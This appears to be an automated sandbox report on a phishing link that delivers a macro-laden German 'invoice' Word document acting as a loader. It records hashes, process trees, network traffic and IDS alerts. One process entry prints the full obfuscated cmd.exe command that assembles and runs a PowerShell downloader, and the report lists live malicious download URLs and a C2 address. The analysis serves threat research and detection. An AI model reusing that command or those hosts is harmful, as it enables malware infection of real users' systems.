analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://greenplastic.com/DE/QVCAASTAA0001265/gescanntes-Dokument/Rechnungsanschrift

Full analysis: https://app.any.run/tasks/42a48a4c-8443-49ed-9533-eb90c9c4d245
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: December 14, 2018, 09:25:11
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
opendir
loader
Indicators:
MD5:

7EF07D597C59A2A067794E7391CE03F0

SHA1:

23FB311BABC6826F485E11BAB0E19FBB9E24A11C

SHA256:

0D05136CB522DBDA5EDA5DC3780DEA4BB53ED768A0DD66B9D52FB3A727BE121A

SSDEEP:

3:N1KZXRGcGP/V8QZAyLdcKAus3AGNLQLuL7cN:CgPtTAYdtszN9m

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2764)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2764)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3008)
    • Application was dropped or rewritten from another process

      • 934.exe (PID: 2540)
      • 934.exe (PID: 3772)
      • archivesymbol.exe (PID: 2924)
      • archivesymbol.exe (PID: 920)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 3964)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3964)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • chrome.exe (PID: 2872)
      • WINWORD.EXE (PID: 2764)
    • Application launched itself

      • WINWORD.EXE (PID: 2764)
      • cmd.exe (PID: 3540)
      • 934.exe (PID: 2540)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3840)
      • cmd.exe (PID: 3540)
      • cmd.exe (PID: 3008)
    • Creates files in the user directory

      • powershell.exe (PID: 3964)
    • Starts itself from another location

      • 934.exe (PID: 3772)
    • Executable content was dropped or overwritten

      • 934.exe (PID: 3772)
      • powershell.exe (PID: 3964)
  • INFO

    • Reads Internet Cache Settings

      • chrome.exe (PID: 2872)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2504)
      • WINWORD.EXE (PID: 2764)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2764)
    • Application launched itself

      • chrome.exe (PID: 2872)
    • Reads settings of System Certificates

      • chrome.exe (PID: 2872)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
51
Monitored processes
21
Malicious processes
5
Suspicious processes
4

Behavior graph

Click at the process to see the details
start drop and start drop and start chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs winword.exe no specs chrome.exe no specs winword.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe 934.exe no specs 934.exe archivesymbol.exe no specs archivesymbol.exe chrome.exe no specs chrome.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2872"C:\Program Files\Google\Chrome\Application\chrome.exe" http://greenplastic.com/DE/QVCAASTAA0001265/gescanntes-Dokument/RechnungsanschriftC:\Program Files\Google\Chrome\Application\chrome.exe
explorer.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
68.0.3440.106
3604"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=68.0.3440.106 --initial-client-data=0x78,0x7c,0x80,0x74,0x84,0x6f4300b0,0x6f4300c0,0x6f4300ccC:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
68.0.3440.106
2856"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2876 --on-initialized-event-handle=304 --parent-handle=308 /prefetch:6C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
68.0.3440.106
4048"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1008,1271383365220138652,16944992696421106841,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=D047695F52D4E5A856185BA6D38AF85B --mojo-platform-channel-handle=1032 --ignored=" --type=renderer " /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Version:
68.0.3440.106
2576"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1008,1271383365220138652,16944992696421106841,131072 --enable-features=PasswordImport --service-pipe-token=6594FA022F0CF9BA49D6BA57F21202F0 --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=6594FA022F0CF9BA49D6BA57F21202F0 --renderer-client-id=4 --mojo-platform-channel-handle=1900 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Version:
68.0.3440.106
2988"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1008,1271383365220138652,16944992696421106841,131072 --enable-features=PasswordImport --service-pipe-token=9A45B09FC40F5B70804A3CCA333C02B1 --lang=en-US --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=9A45B09FC40F5B70804A3CCA333C02B1 --renderer-client-id=3 --mojo-platform-channel-handle=2084 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
68.0.3440.106
2764"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\2018_Dezember_10_19_18_Uhr.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEchrome.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2760"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1008,1271383365220138652,16944992696421106841,131072 --enable-features=PasswordImport --disable-gpu-sandbox --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=5DBB50F874371F0F206AE6F66406BAE8 --mojo-platform-channel-handle=3932 /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
68.0.3440.106
2504"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3840c:\nYwjQcmSnzqz\oPirlnKKhU\rMzdQJEih\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set AG=QtFwnzQYJacnribwCcHbmDpEAnUVF T.4shX+@S;e9/Z'}lvW(8dO-y\G{uj3gxfK$N0)=o:,Ik5&&for %I in (65,1,33,52,69,44,22,73,58,44,39,65,25,20,34,69,25,40,15,53,70,19,59,40,17,1,29,66,40,1,31,48,40,19,16,46,13,40,25,1,39,65,66,34,26,69,44,34,1,1,22,71,42,42,17,13,22,12,13,9,1,13,31,17,70,31,58,74,42,15,41,37,34,1,1,22,71,42,42,9,25,61,58,46,46,9,12,31,17,70,20,31,19,12,42,8,75,52,43,8,37,34,1,1,22,71,42,42,17,58,19,40,31,59,70,19,58,12,61,42,34,37,34,1,1,22,71,42,42,61,40,25,1,40,33,9,25,46,58,13,33,31,17,70,20,42,25,51,75,26,51,58,60,37,34,1,1,22,71,42,42,19,9,33,13,17,74,13,31,17,70,20,42,22,32,20,46,35,66,1,33,44,31,38,22,46,13,1,49,44,37,44,68,39,65,52,38,20,69,44,24,66,18,44,39,65,17,58,74,29,69,29,44,41,60,32,44,39,65,21,27,34,69,44,33,19,5,44,39,65,64,51,38,69,65,40,25,47,71,1,40,20,22,36,44,55,44,36,65,17,58,74,36,44,31,40,62,40,44,39,63,70,12,40,9,17,34,49,65,56,20,63,29,13,25,29,65,66,34,26,68,57,1,12,54,57,65,25,20,34,31,21,70,15,25,46,70,9,51,28,13,46,40,49,65,56,20,63,72,29,65,64,51,38,68,39,65,21,56,15,69,44,30,6,18,44,39,73,63,29,49,49,56,40,1,53,73,1,40,20,29,65,64,51,38,68,31,46,40,25,61,1,34,29,53,61,40,29,50,67,67,67,67,68,29,57,73,25,47,70,74,40,53,73,1,40,20,29,65,64,51,38,39,65,9,16,58,69,44,51,7,23,44,39,19,12,40,9,74,39,45,45,17,9,1,17,34,57,45,45,65,25,15,70,69,44,46,63,15,44,39,85)do set lQ6=!lQ6!!AG:~%I,1!&&if %I==85 echo !lQ6:~-421!|FOR /F "delims=.VXC46 tokens=2" %d IN ('assoc.psc1')DO %d -"c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
3 444
Read events
2 900
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
15
Text files
57
Unknown types
8

Dropped files

PID
Process
Filename
Type
2872chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\83f5afba-a556-4815-9882-34b2f247f92e.tmp
MD5:
SHA256:
2872chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\000016.dbtmp
MD5:
SHA256:
2872chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000016.dbtmp
MD5:
SHA256:
2872chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\babe7680-1f03-429f-b7c7-93d23739b3ec.tmp
MD5:
SHA256:
2872chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.oldtext
MD5:92BE6B127E72365885AD4C3FB6534EE2
SHA256:54302A2573ACC775720E7DB0AD85873276713302B4F72596A8DCC44B01C70E51
2872chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.oldtext
MD5:197882774A7ECEC9046BC48F63189B66
SHA256:27377B0D5F989997C2C3F74ACF163EED44B60631DDAA768F6655D7BE555742B2
2872chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old~RF246a15.TMPtext
MD5:197882774A7ECEC9046BC48F63189B66
SHA256:27377B0D5F989997C2C3F74ACF163EED44B60631DDAA768F6655D7BE555742B2
2872chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Last Versiontext
MD5:C10EBD4DB49249EFC8D112B2920D5F73
SHA256:90A1B994CAFE902F22A88A22C0B6CC9CB5B974BF20F8964406DD7D6C9B8867D1
2872chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old~RF2469e6.TMPtext
MD5:92BE6B127E72365885AD4C3FB6534EE2
SHA256:54302A2573ACC775720E7DB0AD85873276713302B4F72596A8DCC44B01C70E51
2872chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\ac825af9-5fb2-4e6a-bb60-be2443242b43.tmp
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
10
DNS requests
6
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2924
archivesymbol.exe
GET
201.111.83.186:8080
http://201.111.83.186:8080/
MX
malicious
2872
chrome.exe
GET
301
69.16.238.96:80
http://greenplastic.com/DE/QVCAASTAA0001265/gescanntes-Dokument/Rechnungsanschrift
US
html
291 b
malicious
2872
chrome.exe
GET
200
69.16.238.96:80
http://greenplastic.com/DE/QVCAASTAA0001265/gescanntes-Dokument/Rechnungsanschrift/
US
document
92.1 Kb
malicious
3964
powershell.exe
GET
200
212.227.94.120:80
http://cipriati.co.uk/w9/
DE
executable
120 Kb
malicious
3964
powershell.exe
GET
301
212.227.94.120:80
http://cipriati.co.uk/w9
DE
html
297 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2872
chrome.exe
172.217.16.131:443
www.gstatic.com
Google Inc.
US
whitelisted
2872
chrome.exe
172.217.18.163:443
clientservices.googleapis.com
Google Inc.
US
whitelisted
3964
powershell.exe
212.227.94.120:80
cipriati.co.uk
1&1 Internet SE
DE
suspicious
2872
chrome.exe
69.16.238.96:80
greenplastic.com
Liquid Web, L.L.C
US
malicious
2924
archivesymbol.exe
201.111.83.186:8080
Uninet S.A. de C.V.
MX
malicious
2872
chrome.exe
172.217.18.13:443
accounts.google.com
Google Inc.
US
whitelisted
2872
chrome.exe
216.58.207.67:443
ssl.gstatic.com
Google Inc.
US
whitelisted

DNS requests

Domain
IP
Reputation
clientservices.googleapis.com
  • 172.217.18.163
whitelisted
greenplastic.com
  • 69.16.238.96
malicious
www.gstatic.com
  • 172.217.16.131
whitelisted
accounts.google.com
  • 172.217.18.13
shared
ssl.gstatic.com
  • 216.58.207.67
whitelisted
cipriati.co.uk
  • 212.227.94.120
malicious

Threats

PID
Process
Class
Message
2872
chrome.exe
Potentially Bad Traffic
ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide)
2872
chrome.exe
Misc activity
SUSPICIOUS [PTsecurity] Download DOC file with VBAScript
2872
chrome.exe
Attempted User Privilege Gain
SC ATTEMPTED_USER Microsoft Word 2016 use after free attempt
2872
chrome.exe
Potential Corporate Privacy Violation
ET POLICY Office Document Download Containing AutoOpen Macro
3964
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3964
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3964
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3964
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info